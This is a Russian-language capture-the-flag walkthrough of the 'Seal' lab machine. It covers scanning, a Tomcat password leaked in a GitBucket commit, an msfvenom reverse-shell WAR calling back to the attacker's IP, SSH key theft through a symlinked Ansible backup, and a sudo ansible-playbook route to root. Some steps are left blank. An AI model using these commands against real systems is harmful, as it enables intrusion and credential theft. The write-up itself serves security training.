Seal (2021)

Ключевые моменты прохождения:

✅ Используем gobuster с флагом -k для 443 порта(SSL) ✅ Копаемся в GitBucket для того, чтобы найти пароль к tomcat ✅ Обходим 403 ошибку на /manager/html для tomcat из-за мисконфига Nginx ✅ Используем gobuster с флагом -k для 443 порта(SSL) ✅ Создаем WAR-файл с реверс шеллом при помощи msfvenom ✅ Повышаем привилегии с помощью Ansible

Разведка

$ nmap -sC -sV 10.10.10.250 -oN nmap

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
| tls-alpn: 
|_  http/1.1
|_http-title: Seal Market
| tls-nextprotoneg: 
|_  http/1.1
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Sun, 14 Nov 2021 17:44:57 GMT
|     Set-Cookie: JSESSIONID=node0g1uj1edbzrgv1xrj1evcoqopw317862.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   GetRequest: 
|     HTTP/1.1 401 Unauthorized
|     Date: Sun, 14 Nov 2021 17:44:56 GMT
|     Set-Cookie: JSESSIONID=node01qa5y5oujqfpu1mzject0wro0x317860.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sun, 14 Nov 2021 17:44:56 GMT
|     Set-Cookie: JSESSIONID=node0fm2nak9hao5n1wn3obdf1d7d0317861.node0; Path=/; HttpOnly
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Content-Type: text/html;charset=utf-8
|     Allow: GET,HEAD,POST,OPTIONS
|     Content-Length: 0
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   Socks4: 
|     HTTP/1.1 400 Illegal character CNTL=0x4
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x4</pre>
|   Socks5: 
|     HTTP/1.1 400 Illegal character CNTL=0x5
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x5</pre>

На 443 порту у нас есть обычный интернет магазин, который не представляет никакого интереса, кроме некоторых его файлов:

$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --url https://10.10.10.250/ -k -t 40

/images               (Status: 302) [Size: 0] [--> http://10.10.10.250/images/]
/admin                (Status: 302) [Size: 0] [--> http://10.10.10.250/admin/] 
/icon                 (Status: 302) [Size: 0] [--> http://10.10.10.250/icon/]  
/css                  (Status: 302) [Size: 0] [--> http://10.10.10.250/css/]   
/js                   (Status: 302) [Size: 0] [--> http://10.10.10.250/js/]    
/manager              (Status: 302) [Size: 0] [--> http://10.10.10.250/manager/]

Очевидно, что там tomcat. На 8080 порту расположен GitBucket:

После регистрации можно накопать следующий коммит(http://10.10.10.250:8080/root/seal_market/blob/ac210325afd2f6ae17cce84a8aa42805ce5fd010/tomcat/tomcat-users.xml) в проекте seal_market, где остался пароль юзера:

<user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>

В рамках CTF всегда, если вам дают git репозитории нужно искать пароли и другую важную информацию в старых коммитах/бэкапах.

На /manager/html трудно попасть из-за 403 ошибки доступа:

Но есть годный лайфхак, точнее мисконфиг у nginx'а. Я очень сильно рекомендую ознакомится с данной презентацией для более глубокого погружения в тему. Но чтобы не затягивать с этим сразу покажу эксплуатацию:

Для того, чтобы получить начальный шелл(www-data) нам нужно загрузить вредоносный WAR-файл. Создание такого файла происходит так:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<твой локальный айпи адрес> LPORT=<твой порт> -f war > shell.war

В моем случае это было так:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.89 LPORT=9898 -f war > damn_shell.war

Кстати, чтобы загрузить WAR-файл, нужно также использовать мисконфиг:

Получение пользователя

В /opt/backups/playbook можно найти run.yml:

- hosts: localhost
  tasks:
  - name: Copy Files
    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
  - name: Server Backups
    archive:
      path: /opt/backups/files/
      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"
  - name: Clean
    file:
      state: absent
      path: /opt/backups/files/

Тут происходит следующее:

Копирование файлов из дэшборда в /opt/backups/files
Сжатие файлов и сохранение в backup_date-time.gz
Удаление files директории Следовательно, мы можешь сделать так, чтобы получить ключ luis'а:

$ ln -s ~/home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa
$ cp backup-2021-11-14-19:10:32.gz /dev/shm
$ tar -xvf backup-2021-11-14-19:10:32.gz
$ cat dashboard/uploads/.ssh/id_rsa

Получаем рута

$ sudo -l

Matching Defaults entries for luis on seal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *

Создаем файл root.xml и пишем в него:

$ sudo ansible-playbook root.xml

PreviousShibboleth (2022)NextUnion (2021)

Last updated 5 months ago

Was this helpful?